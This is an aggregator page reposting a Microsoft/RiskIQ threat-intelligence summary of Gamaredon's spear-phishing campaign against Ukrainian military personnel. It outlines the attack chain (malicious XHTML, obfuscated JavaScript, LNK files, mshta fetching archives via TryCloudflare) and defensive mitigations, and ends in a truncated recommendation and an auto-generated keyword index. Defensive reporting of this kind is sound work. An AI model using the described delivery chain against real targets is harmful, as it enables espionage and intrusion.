One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8573564 |
| Date de publication | 2024-09-10 01:04:02 (vue: 2024-09-10 01:19:53) |
| Titre | Spear-Phishing dans le champ de bataille: l'assaut continu de Gamaredon sur les militaires de l'Ukraine \\ Spear-Phishing in the Battlefield: Gamaredon\\'s Ongoing Assault on Ukraine\\'s Military |
| Texte | #### Targeted Geolocations - Ukraine ## Snapshot Cyble Research and Intelligence Labs (CRIL) identified an active campaign by the Gamaredon APT group, tracked by Microsoft as [Aqua Blizzard](https://security.microsoft.com/intel-profiles/9b01de37bf66d1760954a16dc2b52fed2a7bd4e093dfc8a4905e108e4843da80), targeting Ukrainian military personnel with spear-phishing emails. ## Description These emails, which use military summons as a lure, contain malicious XHTML attachments that execute obfuscated JavaScript code. Upon opening, the code downloads a malicious archive, which includes a Windows shortcut (LNK) file. When executed, this LNK file triggers the execution of a remote .tar archive hosted anonymously on TryCloudflare\[.\]com via mshta.exe, leveraging the one-time tunnel feature to evade detection. The campaign is large-scale and coordinated, with a widespread distribution of similar files, indicating ongoing activity. The attackers are employing sophisticated tactics to monitor the campaign\'s effectiveness, including the use of a 1-pixel remote image to track victim interactions. According to Cyble, Gamaredon has been active since at least 2013, engaging in cyber-espionage activities against Ukrainian government institutions, military, and critical infrastructure sectors. ## Microsoft Analysis The actor that Microsoft tracks as [Aqua Blizzard](https://security.microsoft.com/intel-profiles/9b01de37bf66d1760954a16dc2b52fed2a7bd4e093dfc8a4905e108e4843da80) is a nation-state activity group based out of Russia. The Ukrainian government has publicly attributed this group to the Russian Federal Security Service (FSB). Aqua Blizzard is known to primarily target organizations in Ukraine including government entities, military, non-governmental organizations, judiciary, law enforcement, and non-profit, as well as entities related to Ukrainian affairs. Aqua Blizzard focuses on espionage and exfiltration of sensitive information. Aqua Blizzard\'s tactics are constantly evolving and encompass a multitude of advanced techniques and procedures. The actor is known to primarily use spear-phishing emails with malicious attachments that contain a first-stage payload that downloads and launches further payloads. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. - Turn on the following [attack surface reduction rules](https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction) to block or audit activity that can be associated with this threat. Then check the security recommendations card for the deployment status of monitored mitigations. - [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion) - Block JavaScript or VBScript from launching downloaded executable content - Block the launch of potentially obfuscated scripts - Sysmon can be configured to detect if Cl*oudflare Tunnel* is being staged on a system. If *Cloudflare Tunnel* is detected, Sysmon persistently deletes the utility. Sysmon also creates a Microsoft Windows event corresponding to this detection. Download [Sysmon v15.0](https://learn.microsoft.com/sysinternals/downloads/sysmon?ocid=magicti_ta_learndoc). - Sysmon can be configured to use a configuration file with the FileBlockExecutable directive. Systems installed with Sysmon can use this configuration parameter to effectively block writing of executable files to sensitive directories, such as default domain policies within SYSVOL. Sysmon creates a Windows event that corresponds to this detection. Download [Sysmon v15.0](https://learn.microsoft.com/sysinternals/downloads/sysmon?ocid=magicti_ta_learndoc). - A script auth |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | #### **© *cloudflare 2013 2024** 365 365#recommended 365/security/defender 365/security/defender/microsoft 365/security/office about access according acquired across action active activities activity actor actors addition additional addresses advanced affairs against age alert alerts all allow allowed already also analysis anonymously anti antispam antivirus any application applications applocker apply apt aqua archive are artifacts assault assess associated atp attachments attack attacker attackers attacks attributed audit authored auto automated automatic automatically available based battlefield: become been behind being blizzard block breach breaches brings browsers bypass bypassing campaign can card caution center centralize check cl*oudflare click cloud code com com/blog/gamaredons com/deployedge/microsoft com/en com/exchange/troubleshoot/antispam/cautions com/intel com/johnlatwc/shared/tree/master/scripts com/microsoft com/sysinternals/downloads/sysmon com/windows/security/application communication configuration configure configured configure connections constantly contain content control control/applocker/applocker control/windows coordinated copyright corresponding corresponds cover coverage creates cril criterion critical customers cyber cyble default defender defenses delete deletes delivered delivering deploy deployment description detect detected detection detections/hunting detects determine detonate developed devices directive directories distribution dns does domain domains download downloaded downloads edge edr effectively effectiveness email emails employing enable enables encompass endpoint endpoint/attack endpoint/automated endpoint/configure endpoint/edr enforcement engaging enhanced ensure entities environment environments eop equivalent espionage evade even event evolving exchange exe executable execute executed execution exfiltration explorer explorer#system extra feature federal file fileblockexecutable files filter filtering filters first flow focuses following from fsb full further gamaredon geolocations government governmental grant group harmful has have help honor hosted hour https://cyble https://docs https://github https://learn https://security identified identify identities image immediate impact inbound inbox incident includes including incoming indicate indicating information infrastructure insights installed institutions intelligence interactions invest investigation investigations javascript judiciary known labs large latest launch launches launching law layer learndoc learning least legitimate let leverage leveraging links list lists lnk locations logging lure machine made mail mailboxes majority malicious malware management may mde mdo meet messages method microsoft military military/ mitigations mode monitor monitored more mshta multitude nation native network neutralizes new newly non not novel obfuscate obfuscated occurs ocid=magicti off office one ongoing online only on opening operating organization organizations other out outgoing overrides overview parameter part pass passive payload payloads permission persistently personnel phishing pixel policies policy polymorphic post potentially prevalence primarily prior procedures product profiles/9b01de37bf66d1760954a16dc2b52fed2a7bd4e093dfc8a4905e108e4843da80 profit prohibited protect protection protections provides publicly purge queries rapidly reached read recheck recipient recommendations recommends reduce reducing reduction reduction#block references regular related remediate remediation remote reproduction requests requisite research reserved resolve response response restrict restriction retroactively review rewriting rights rules run running russia russian safe scale scanning scenes script scripts search sectors security security/anti security/application security/configure security/create security/safe security/threat select sender senders sensitive sent service settings shortcut sight signature signatures significantly similar since site smartscreen snapshot software solutions that soon sophisticated spam sp |
| Tags | Spam Malware Tool Threat Legislation |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.